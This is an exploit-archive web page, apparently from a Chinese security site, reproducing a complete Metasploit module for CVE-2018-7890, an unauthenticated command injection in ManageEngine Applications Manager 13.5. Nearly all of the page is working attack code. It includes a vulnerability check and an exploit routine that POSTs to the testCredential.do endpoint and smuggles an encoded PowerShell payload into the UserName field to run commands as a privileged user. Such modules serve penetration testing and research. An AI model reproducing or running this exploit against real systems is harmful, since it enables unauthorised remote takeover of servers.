首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)
来源:mehmet@mehmetince.net 作者:Mehmet 发布时间:2018-03-13  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Powershell
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "ManageEngine Applications Manager Remote Code Execution",
      'Description'    => %q{
        This module exploits command injection vulnerability in the ManageEngine Application Manager product.
        An unauthenticated user can execute a operating system command under the context of privileged user.
 
        Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials
        by accessing given system. This endpoint calls a several internal classes and then executes powershell script
        without validating user supplied parameter when the given system is OfficeSharePointServer.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
        ],
      'References'     =>
        [
          ['CVE', '2018-7890'],
          ['URL', 'https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/']
        ],
      'DefaultOptions'  =>
        {
          'WfsDelay' => 10,
          'RPORT' => 9090
        },
      'Payload' =>
        {
          'BadChars' => "\x22"
        },
      'Platform'       => ['win'],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'         => [ ['Automatic', {}] ],
      'Privileged'     => true,
      'DisclosureDate' => 'Mar 7 2018',
      'DefaultTarget'  => 0
    ))
 
    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI of the application', '/'])
      ]
    )
  end
 
  def check
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(10),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(3),
        'UserName' => Rex::Text.rand_text_alpha(3)
      }
    })
    if res && res.body.include?('Kindly check the credentials and try again')
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
 
  def exploit
 
    powershell_options = {
      encode_final_payload: true,
      remove_comspec: true
    }
    p = cmd_psh_payload(payload.encoded, payload_instance.arch.first, powershell_options)
 
    print_status('Triggering the vulnerability')
 
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'testCredential.do'),
      'vars_post' => {
        'method' => 'testCredentialForConfMonitors',
        'type' => 'OfficeSharePointServer',
        'montype' => 'OfficeSharePointServer',
        'isAgentEnabled' => 'NO',
        'isAgentAssociated' => 'false',
        'displayname' => Rex::Text.rand_text_alpha(10),
        'HostName' => '127.0.0.1', # Try to access random IP address or domain may trigger SIEMs or DLP systems...
        'Version' => '2013',
        'Powershell' => 'True', # :-)
        'CredSSP' => 'False',
        'SPType' => 'SPServer',
        'CredentialDetails' => 'nocm',
        'Password' => Rex::Text.rand_text_alpha(3),
        'UserName' => "$(#{p})"
      }
    })
 
  end
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Sony Playstation 4 (PS4) 4.55
·DEWESoft X3 SP1 (64-bit) - Rem
·Memcached 1.5.5 - 'Memcrashed
·memcached Proof of Concept Amp
·WebLog Expert Web Server Enter
·WebLog Expert Web Server Enter
·Eclipse Equinoxe OSGi Console
·CloudMe Sync 1.9.2 Remote Buff
·Chrome V8 JIT JSBuiltinReducer
·Chrome V8 Out-Of-Bounds Read
·Chrome V8 JIT Optmization Bug
·Softros Network Time System Se
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved